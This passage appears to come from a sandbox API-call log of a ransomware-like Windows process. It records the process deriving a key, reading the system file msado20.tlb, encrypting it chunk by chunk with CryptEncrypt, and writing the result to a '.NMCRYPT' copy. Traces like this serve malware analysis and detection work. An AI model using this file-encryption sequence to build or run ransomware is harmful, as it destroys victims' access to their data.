pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.897] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.898] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0166.898] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.898] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad278) returned 1 [0166.898] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.898] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.898] wcslen (_String="\\\\?\\") returned 0x4 [0166.898] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad178) returned 1 [0166.898] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.898] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.899] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=51200) returned 1 [0166.899] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0166.899] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.900] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.901] GetLastError () returned 0x0 [0166.901] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.091] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.091] GetLastError () returned 0x0 [0167.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.091] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.091] GetLastError () returned 0x0 [0167.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.091] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.091] GetLastError () returned 0x0 [0167.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.091] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.091] GetLastError () returned 0x0 [0167.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.091] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.091] GetLastError () returned 0x0 [0167.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.091] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.091] GetLastError () returned 0x0 [0167.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.092] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.092] GetLastError () returned 0x0 [0167.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.092] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.092] GetLastError () returned 0x0 [0167.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.092] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.092] GetLastError () returned 0x0 [0167.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.092] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.092] GetLastError () returned 0x0 [0167.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.092] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.092] GetLastError () returned 0x0 [0167.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.092] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.092] GetLastError () returned 0x0 [0167.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.092] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.092] GetLastError () returned 0x0 [0167.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.093] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.093] GetLastError () returned 0x0 [0167.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.093] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.093] GetLastError () returned 0x0 [0167.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.093] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.093] GetLastError () returned 0x0 [0167.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.093] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.093] GetLastError () returned 0x0 [0167.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.093] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.093] GetLastError () returned 0x0 [0167.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.093] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.093] GetLastError () returned 0x0 [0167.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.094] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.094] GetLastError () returned 0x0 [0167.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.094] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.094] GetLastError () returned 0x0 [0167.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.094] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.094] GetLastError () returned 0x0 [0167.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.094] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.094] GetLastError () returned 0x0 [0167.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.094] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.094] GetLastError () returned 0x0 [0167.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.094] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.094] GetLastError () returned 0x0 [0167.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.094] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.094] GetLastError () returned 0x0 [0167.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.095] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.095] GetLastError () returned 0x0 [0167.095] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.095] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.095] GetLastError () returned 0x0 [0167.095] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, 